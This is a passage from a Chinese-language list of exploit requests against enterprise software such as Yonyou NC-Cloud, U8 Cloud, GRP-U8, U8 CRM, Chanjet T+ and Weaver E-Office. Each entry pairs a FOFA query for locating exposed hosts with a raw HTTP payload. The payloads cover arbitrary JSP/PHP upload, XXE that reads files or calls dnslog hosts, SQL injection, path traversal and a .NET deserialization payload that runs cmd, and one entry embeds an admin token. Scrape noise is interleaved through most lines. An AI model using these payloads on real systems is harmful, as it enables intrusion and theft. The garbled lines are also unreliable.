User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 s7 r/ m4 r- e4 E; \6 F
Content-Type: application/x-www-form-urlencoded
- Y2 E# ]5 J  d+ @3 k  V' pAccept-Encoding: gzip, deflate9 n9 @5 v$ S0 Q& O
Accept: */*
% ~: ]$ B8 s2 ]" S6 SConnection: keep-alive3 D( u1 t# ~  `& D) ]0 Z; U

2 @( R! R( q. w  T2 u+ h
+ ~  J5 N& b8 e( J6 g1 |35. 用友NC-Cloud importhttpscer任意文件上传" S( Y& c- H# \5 J* i5 O
FOFA:app="用友-NC-Cloud"6 X% ^( A9 O8 t% Q
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1% d3 @" r8 ], c& g: `6 q/ t# `9 B
Host: 203.25.218.166:8888/ K. j1 Y0 r( A% H' m2 S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 c8 _: `$ ^4 m" X2 h3 z# r% tAccept-Encoding: gzip, deflate  |1 W7 A' i9 U5 |9 k# T. l' u
Accept: */*0 g+ S" ?8 c7 L3 X6 T
Connection: close
; v% O7 Y9 q& w! L& r5 {/ g' XaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" n; U+ S# \% P7 f/ t+ ~  j: _
Content-Length: 190+ C# s/ c. h3 {9 X0 l4 b  A5 ^
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
  L- C1 ], z% A# A) K# p4 R" Z' Z
--fd28cb44e829ed1c197ec3bc71748df0
- V  c+ T  V3 _" P' pContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"( _$ B6 T8 p" s. O) q. h- }
7 E0 [0 |' E  X- f, {
<%out.println(1111*1111);%>. W# S1 s, \- K7 X" ?: r" o" c
--fd28cb44e829ed1c197ec3bc71748df0--/ a' H" y4 H% H2 y& k+ {
: J3 ~: _" i4 t3 q  O( @, Y
) u0 [6 r. g0 a3 A+ W
36. 用友NC-Cloud soapFormat XXE. |8 v1 s, I) |
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
3 }' ^' v# {7 P. QPOST /uapws/soapFormat.ajax HTTP/1.1
9 Q' F( Q$ f! z# q' p3 B0 b! KHost: 192.168.40.130:8989
) ?6 I: ?/ P* u9 `. |7 F% p' `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.09 X- }' E/ R. J! s/ l' M
Content-Length: 263
* g6 h! T1 g# L: p' gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" [! S' O3 e  J5 ]2 ZAccept-Encoding: gzip, deflate$ \3 K  R$ c  u6 o. o8 Q" G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ^- V# F+ D& S  t! r8 D
Connection: close7 Z# q9 U, s! ^4 Z* R2 ~
Content-Type: application/x-www-form-urlencoded
# h8 E: W' ]4 K% C' ~% j% bUpgrade-Insecure-Requests: 1
  I( ]; S4 ~4 Z9 Q: q' ?" ?
% c# Z- N& \7 q9 ~$ }0 u+ Dmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
4 s; u2 X0 W( r9 g. i; h, \- H' v" r. F  K. _, J" [

9 f3 d/ w2 c+ U  l# h5 p9 w37. 用友NC-Cloud IUpdateService XXE
$ r6 `  o% Q) _' y% VFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% b3 x% J* u2 {POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
* m: T# u3 l# HHost: 192.168.40.130:8989
0 n9 I9 n) A+ m$ J* J; TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.365 j  y9 ^( u: k5 Q8 V+ K) N$ r
Content-Length: 421% v5 _- r! U; s" @# ]$ I6 q  R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# f( K; y5 M- W
Accept-Encoding: gzip, deflate
; y8 N# q; x2 {0 S7 [Accept-Language: zh-CN,zh;q=0.9
" r% |% _$ z# w2 J$ P% x8 AConnection: close$ o2 P  l6 @5 x
Content-Type: text/xml;charset=UTF-8
& U* E0 s1 X  q8 r! O, bSOAPAction: urn:getResult
& F  V) S4 E. GUpgrade-Insecure-Requests: 1' N, p, O5 v( y; l2 n# s6 I

8 t3 V0 ~, \- G! a4 \8 p2 w<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">8 ?! m) t4 q4 G) r6 M
<soapenv:Header/>
) e2 B2 r. @( u( u  L<soapenv:Body>
4 b' f0 z7 Z" z<iup:getResult>
3 d7 s) ?  w3 x. F. `# D* V<!--type: string-->$ z7 I$ @3 F  m& u
<iup:string><![CDATA[
% k* f- C% d1 L<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>% P* U% ^! a+ l" h! g- F
<xxx/>]]></iup:string>2 w" B* p  z* x+ ?
</iup:getResult>- P6 k/ ]2 y( v* C) O3 F& `7 s- a
</soapenv:Body>. ?& x* H4 v* ^4 a- S& B
</soapenv:Envelope>& d* g. Q2 @8 I9 |) q: ]
' Y6 _+ f& ~4 e  @2 w3 R
  Z6 Z6 \$ K& {7 W! d, o0 s3 ]

: H" Y3 y9 y% h! g38. 用友U8 Cloud smartweb2.RPC.d XXE: J: z% x8 [1 F1 N% H
FOFA:app="用友-U8-Cloud"
6 p1 F, T" R' U9 A' A& |1 iPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
5 }" X% L9 b, D. fHost: 192.168.40.131:80884 E2 D% }4 g5 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
# ]+ P2 t* |  f6 r- R  o9 `1 z) FContent-Length: 260
8 D* E. b7 f& Z3 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
* [) z6 _: X1 P) p: F- G& nAccept-Encoding: gzip, deflate8 k  P( y$ l: Y2 [* K8 F+ D) k$ [
Accept-Language: zh-CN,zh;q=0.9
1 b  s. t# Y$ T+ BConnection: close
( W6 g0 ?# ^0 L5 Z) YContent-Type: application/x-www-form-urlencoded3 ]& W: @& x, o

7 N+ y, ~5 e( |, D% F__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
6 k/ H. ?3 V, _4 ?8 X% _! y$ x7 d2 c( R5 Y1 D/ I" o# w
, [/ J$ K5 |; Y$ e9 q7 H
39. 用友U8 Cloud RegisterServlet SQL注入0 c, D/ z+ A) p5 W& I0 V
FOFA:title="u8c"" s# g% A5 `, N8 h& {  \9 C
POST /servlet/RegisterServlet HTTP/1.1
! L; q8 F' p* q' jHost: 192.168.86.128:8089- I! P3 e; Q& z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+ L% `  x! @: P3 t- y4 D4 dConnection: close7 s0 K7 g5 R  A. W" S: o
Content-Length: 852 Z' c" P; e. [; Z* t
Accept: */*
3 ]% M$ m' e1 h" O; K; H  iAccept-Language: en
1 O7 a2 i; t' g5 s" J. zContent-Type: application/x-www-form-urlencoded
; s3 g$ V2 d: [0 h! F/ rX-Forwarded-For: 127.0.0.1% u4 i: t2 h# k8 S( L
Accept-Encoding: gzip8 a+ f6 F3 G! _( }5 p4 ?

% W- B$ H" G) R% [$ K1 Rusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--; ?3 j0 `2 W; b

6 P! M, c( V' b) \
" ?% t( x* y/ C: N. d1 X+ P4 |( C40. 用友U8-Cloud XChangeServlet XXE
+ |1 j! p9 o+ b6 W7 YFOFA:app="用友-U8-Cloud": u% Y' X8 V% `8 V. R6 {
POST /service/XChangeServlet HTTP/1.17 a9 J+ Z) S8 t0 n+ g
Host: x.x.x.x) }. z5 z! N" R' V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 J. _: [1 U" E* X
Content-Type: text/xml  {% E- {% n/ p+ K& |6 Z& N
Connection: close
9 f4 x2 E! |; a8 Z; {  u8 |* p6 g/ m+ y9 P% e0 m
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
( r! o; H9 A9 z
( h* g+ X* Z3 P" ?5 g; F
+ p6 R" `( ^, F. T' s; t8 m$ {, I3 c0 t41. 用友U8 Cloud MeasureQueryByToolAction SQL注入9 i5 p+ F0 }- q. X
FOFA:app="用友-U8-Cloud"; l/ m/ @$ S( W$ a# p3 i9 a1 I6 X
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.16 Z6 B# m% h- k& m: s/ v9 z: c
Host:- d5 _1 e' |  L# M' @6 p9 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 F" O4 d, S: l1 v9 Y. ~' K5 eContent-Type: application/json
9 I) M2 C4 ~/ r, @% e' `Accept-Encoding: gzip
4 e! Z; t+ ?+ ~. w! B- vConnection: close
% x- |2 n2 H2 I+ H8 J2 I7 c/ K7 [8 @, _! g: |
% M' K+ L/ _( p: k0 _- U. b" u0 q9 r
42. 用友GRP-U8 SmartUpload01 文件上传
4 @. |  l0 Y! nFOFA:app="用友-GRP-U8"
5 |, z9 s: t5 {7 L( x  ZPOST /u8qx/SmartUpload01.jsp HTTP/1.15 N0 w3 K7 m+ {7 V% [
Host: x.x.x.x
# ^# v% Z/ l" L; V$ M& dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ n) q  S! y" z8 c- g+ UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36$ Y' O" c5 ?3 C- t  q# h8 p7 l

% u7 _+ c! ~3 r( K$ a! jPAYLOAD
; `4 _  e8 `! y/ |, I$ G
6 a5 ?; f+ ]# i3 F* g" j' |( m' O- f; L  K8 H3 R4 L
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
% K& p0 n: U2 w/ ~9 v) T" J
" J$ d- Q/ f5 R5 }43. 用友GRP-U8 userInfoWeb SQL注入致RCE: p* M+ v9 B6 b. o
FOFA:app="用友-GRP-U8"' T& j( s3 E9 v, t8 W  x' Z6 P$ V
POST /services/userInfoWeb HTTP/1.1. X/ Q8 S* s# \. l& J3 r
Host: your-ip6 j& ~9 N9 f' E+ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: p- q6 v0 y2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: u' T+ x- P* E2 S; Q( {
Accept-Encoding: gzip, deflate* m( }( ]7 ?1 c! C
Accept-Language: zh-CN,zh;q=0.9
, k: k4 y8 ~$ v' z% @, mConnection: close
" ~. o9 j/ k( v9 G0 w! JSOAPAction:
  c' X/ {" |7 F( |( g" j& uContent-Type: text/xml;charset=UTF-8
) n4 r( M- x' s* U" D2 y
! g" @9 h* R& o+ p/ }/ U, C: R<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">2 y" R9 d/ `; r! M" `
   <soapenv:Header/>
0 F0 O9 s' G8 R* j9 ^3 B   <soapenv:Body>
/ {. @" U/ W- @5 }( E# u      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
0 b: r, O4 c8 i: o         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>. C5 D' G5 l* o$ d
      </ser:getUserNameById>
2 W2 D7 d% |7 W9 O: V5 [& M1 \. }   </soapenv:Body>& Y" Q8 L& u7 F9 T( l2 [5 Q
</soapenv:Envelope>
+ A9 R* x+ o" e9 U7 ^0 M+ ^6 a, j: z; I, i8 ^% s& u8 g

9 C* z9 N: `& L& o5 j0 B6 R2 l0 i  Z* H44. 用友GRP-U8 bx_dj_check.jsp SQL注入' l0 o$ [* `  y4 E' l6 f; ^
FOFA:app="用友-GRP-U8"
  @  v/ \' Q  F% }, n5 `: ^; E# HGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
" y1 ^9 a/ F1 M1 H  LHost: your-ip# t; I. F! W" c+ i2 j" A9 Y+ L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36& P* [: a6 c$ n2 U9 f$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# D: C3 L# |* n/ cAccept-Encoding: gzip, deflate
0 R/ c/ _* ^# e4 mAccept-Language: zh-CN,zh;q=0.97 B* Q5 _: [3 y2 B
Connection: close
3 V7 R- o, r& ^# J3 u2 G. h1 i) t/ t* l0 ^3 i+ d% {# k$ G

2 l) @- h6 X9 o- y8 i2 P* k45. 用友GRP-U8 ufgovbank XXE
" E( Y8 t) z  Q6 \$ u3 E% C# Y  AFOFA:app="用友-GRP-U8"
- C: }. `6 n. f9 J$ q2 XPOST /ufgovbank HTTP/1.13 d" B; J& W7 b2 j% p0 ~% l0 D
Host: 192.168.40.130:2227 S' n* m) i5 Z8 m% o0 |- @0 Q3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0% C  k& a! Q6 o  a
Connection: close6 w6 B$ r0 V& B4 K4 x" g2 U, x
Content-Length: 161) B$ E- ]. Y- u9 @# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. w+ i  Z8 u0 D5 K6 _- e3 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 Z; c9 K1 L4 `- \; p/ |Content-Type: application/x-www-form-urlencoded
. x+ }& K( L* i! v' {3 s6 mAccept-Encoding: gzip
& f0 \: `) z1 O  M6 S9 p4 |' Z
' A% \: d- D4 i' S9 J! TreqData=<?xml version="1.0"?>
& Z& T0 d* @6 i. G2 P- E  P<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
3 R, n, d5 C( y" p
8 ~  [! g; F' g. T1 G
5 R+ P( Q2 A1 x/ ?46. 用友GRP-U8 sqcxIndex.jsp SQL注入
- g) s$ t. P0 F) H' }FOFA:app="用友-GRP-U8"! a# J  K" J5 V. a; \
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
3 @2 p6 A4 Z, r' o) |) |Host: your-ip
& @' A% Y/ \: ?  _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
: E, Q8 [: s8 d7 c  m+ r- n8 q- tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ ~0 }" ?/ I" v3 N$ NAccept-Encoding: gzip, deflate
2 n( I& W8 F7 n: L6 q, X* ^* }Accept-Language: zh-CN,zh;q=0.9
; I& w# V/ H6 [& M4 |+ cConnection: close
3 I* j  i$ d0 n$ E& P# b
! N& I* _4 d6 ]% g! L
; [  \8 _2 t9 e! i) g47. 用友GRP A++Cloud 政府财务云 任意文件读取
4 @5 |8 e$ q% s% J; tFOFA:body="/pf/portal/login/css/fonts/style.css"4 ]9 I( `* C* v
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" J& j9 O% V0 m1 c6 _Host: x.x.x.x
8 B+ N8 J% O2 ^+ @Cache-Control: max-age=01 x; m6 [& b/ c6 W( P
Upgrade-Insecure-Requests: 1
$ f! X. ]+ a! i4 l' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 w! Q/ E5 b7 V$ ^' a) HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 m# M8 ^7 A* v2 {' _
Accept-Encoding: gzip, deflate, br
/ y. {" o. T' o: A6 o, IAccept-Language: zh-CN,zh;q=0.93 {% n: X. o8 M
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
5 |; z: x$ s5 @9 JConnection: close
: S; }7 D/ [" o7 o) Z  k
8 w% ~9 U7 `/ M# W4 S  ^5 y0 y$ ?8 H7 B2 E' |: M  J  x
4 t; b- F- ]" O* h4 T
48. 用友U8 CRM swfupload 任意文件上传
" d$ k: X) k, k* BFOFA:title="用友U8CRM"
4 y0 z- J' ?8 u; @3 PPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
5 a5 E2 W3 v. r& C: `, @# ~) DHost: your-ip
9 `; E" |& y) o  kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. k0 `0 ?/ g. Z0 D7 K# ?$ }" yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; S) u# D" a" X$ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: S; O$ a, b" M3 `
Accept-Encoding: gzip, deflate
4 |0 u5 ^& l% H. kContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
: Q3 p! s2 I  Y/ s0 j; _. o$ c/ \------269520967239406871642430066855/ r- P2 m. f" k: d
Content-Disposition: form-data; name="file"; filename="s.php"
0 J# x) J  K7 w% W( E/ K& P4 _6 S1231/ c$ f0 Y# i9 P& _. A, b
Content-Type: application/octet-stream
% h" }$ U; q- e* z, A' N4 f------269520967239406871642430066855
3 G" Z5 {: j$ N; MContent-Disposition: form-data; name="upload"
$ m: Z( T' U2 m7 e" c8 C3 x( Dupload
+ M" W- w3 D: e6 f! w3 F------269520967239406871642430066855--
2 r0 A% w! f7 A
* {/ S* x( {' J6 u# r! S3 l, ~# h$ U! z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传4 U& E# U6 V) _2 Y. s
FOFA:body="用友U8CRM", B* {* i8 y# |9 Z; ]% U

4 r2 I7 d) F, u- c# y" Y) yPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.10 J) ?4 U9 M; \" u* k
Host: x.x.x.x  q/ k% ?) @5 U: N/ l* x9 m! J) w8 A; i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& z8 f8 L4 G3 a9 r' q1 S" a
Content-Length: 329
* j, s3 E& G1 P7 ~+ H) _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. x' \. p& M4 v  L: u* q
Accept-Encoding: gzip, deflate
0 n/ I& I2 h! a4 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 h' A$ [! P% T3 a6 r: x* Q! UConnection: close7 m. T- W* y5 U( M) Q
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w. F, b. i3 T/ G8 E
, g7 g# y) W9 C4 {: V
-----------------------------vvv3wdayqv3yppdxvn3w) _2 |+ y# L+ v8 f) d  U8 Y& G
Content-Disposition: form-data; name="file"; filename="%s.php "$ U, k. \6 R  z
Content-Type: application/octet-stream9 i% B" H" J, P! `' A0 U1 C
3 D( U9 y  m7 {6 \! f" L0 O# K
wersqqmlumloqa
( _1 o0 `/ @2 W-----------------------------vvv3wdayqv3yppdxvn3w$ t( R% m4 T/ k5 V- I
Content-Disposition: form-data; name="upload"" X* c8 p! s) A, `# \' ]" d

7 d/ ^/ c  B/ T8 dupload
# N: g+ A4 V. Y: U2 s% I8 W: ~-----------------------------vvv3wdayqv3yppdxvn3w--
  |( w/ U+ _3 x1 k% h4 w5 o
+ h8 |+ n7 G* K- `$ K/ T: J" J
$ D) V# G2 V, S- chttp://x.x.x.x/tmpfile/updB3CB.tmp.php5 T3 A* `+ c9 s! G: J
. v+ f; p% @  m: z; ~  Y
50. QDocs Smart School 6.4.1 filterRecords SQL注入+ M9 x5 z4 }+ ?$ i
FOFA:body="close closebtnmodal"
/ w3 [+ h3 L' @5 K% e, D. `: a9 yPOST /course/filterRecords/ HTTP/1.11 L. H7 f' B2 _  `
Host: x.x.x.x
3 X) f- I" z) k7 J2 V" rUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 N% k" J7 h: I/ p( E* A) WConnection: close& A' y# _; h. h  G! Y& a5 Y" [7 B- w2 {
Content-Length: 224$ u! A+ _, U! F2 A4 t
Accept: */*8 Y) T7 S. L( ~5 {  I' V- h9 _
Accept-Language: en: k$ r: n7 t) x
Content-Type: application/x-www-form-urlencoded; J2 V5 m7 d6 m) D/ q$ ^
Accept-Encoding: gzip# q0 h& f8 f9 y" b
9 o! N) V4 j( n- `$ ]+ |7 F8 R
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
8 |7 U, O3 Y  f5 k7 s$ z1 h. `* D0 ?

4 c6 D. I$ s8 }  \/ q51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& k0 C% y2 a+ ?* \- C9 m* mFOFA:app="云时空社会化商业ERP系统"( q' f6 A6 X6 N! z" V
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
, m" r9 y8 x2 N4 e$ }  ~2 QHost: your-ip
, V. h9 [" }% ~User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
7 p, M0 I6 ~. o8 T5 N0 Z" cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 F. ~/ Y' D# X1 D, i! }Accept-Encoding: gzip, deflate
0 M" G  f! i4 H3 j  ~Accept-Language: zh-CN,zh;q=0.99 z( d! e( t# u4 h' J" {
Connection: close
4 x, C$ n  \1 u( [+ z
) m+ ^2 P" w& @9 [1 D( \0 V' O2 O) w& N. L$ T
52. 泛微E-Office json_common.php sql注入
0 d( j- i( j) c3 ?9 fFOFA:app="泛微-EOffice"
7 i1 E# r- \) |# ~. QPOST /building/json_common.php HTTP/1.1) W* @7 ?6 H5 h+ h6 _; \
Host: 192.168.86.128:8097
, E& M; R/ m9 AUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, N7 [& H( ^4 ^. }5 P0 g
Connection: close3 w; g; H) ]  {' c
Content-Length: 87
1 R( }/ U' D6 d) c5 v/ d, K. QAccept: */*( a$ e2 [% r4 U0 f6 ~
Accept-Language: en. |! d1 Q$ Y; g
Content-Type: application/x-www-form-urlencoded: W- J+ m+ A0 O
Accept-Encoding: gzip+ `3 c" g/ ~( b( ^
: S" z. K, H( R$ B# J  P9 x
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333! f! R4 C! W2 s+ G1 E% v8 i& V

: _1 E: B. X) y/ ~; s1 Q& n  w% |! c/ j+ N+ _2 N& t
53. 迪普 DPTech VPN Service 任意文件上传$ {  x+ q6 O  a6 c0 o: R; O( L
FOFA:app="DPtech-SSLVPN"& r; G# G" d/ x* Q; s5 k) }4 L
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd$ Z' D* x8 r: A0 x) E
( m# w8 _, s* V1 R. P
' f5 d3 x- w; k6 [7 e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
  X& k" K0 U2 A4 ~' d9 ~2 y5 DFOFA:app="畅捷通-TPlus"  l+ Y; `$ S( G9 a2 E+ h
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
6 p: ]. d7 a4 f. q  V+ n* q"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"; O$ u, y, ^# A5 t1 h

2 V& a7 h6 q! g- s. m+ T/ g/ X5 I) A- ]
完整数据包  K# C: S9 r& f& |1 N
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
- ]1 |6 j  z- U5 z  m' Z0 |Host: x.x.x.x) J* Y) m* i* @* Z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F3 l( m: |1 R, u
Content-Length: 593
% Z9 n( z2 D* M. T9 b7 X9 y2 r$ c  f: e8 J# O; j2 Q
{. \, v  \+ W( l+ H1 U
"storeID":{" f# `, j; T- [$ A8 E
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",4 u: ?% o$ g) x& b% t
"MethodName":"Start",
0 e! D7 Q; t0 W2 G0 F: c6 @  "ObjectInstance":{
. M  F! I7 Q$ T$ F* u& p9 I   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% T! y* S$ Z, U; \* n
    "StartInfo":{9 L; n! t+ s' m) V+ s6 ]6 c. R4 l
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 p- O( U+ N' Q
    "FileName":"cmd",( z7 x" {( v* s  o# p
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
0 s2 \' u- j2 [- c: h, Y& k    }* p. L/ z6 H& B2 J* n
  }
  o7 n1 M5 Y% J/ p  r: D  }
& t* {( |* v4 o( b/ c1 u( t! _' f}
% x+ T0 a/ X6 T. W: [& t& g; r# M
# U  U! a: e8 l( _' t% N# ?" v7 d1 T7 h& Z! V2 a5 [) _" G% ?, @
第二步,访问如下url' F4 i8 |8 `) R
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
" C- c; C; o5 e: v
) r7 N8 E9 f5 z$ P, B
/ V3 C" Q9 a% B% F* c' [2 P55. 畅捷通T+ getdecallusers信息泄露& M: x. z1 L# @; h; F
FOFA:app="畅捷通-TPlus"- R$ n1 w4 w3 Y+ i( b
第一步,通过
' {6 e* u! g% Q# O8 n/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie/ v+ @# n, ^5 W3 Y9 q& b0 j
第二步,利用获取到的Cookie请求
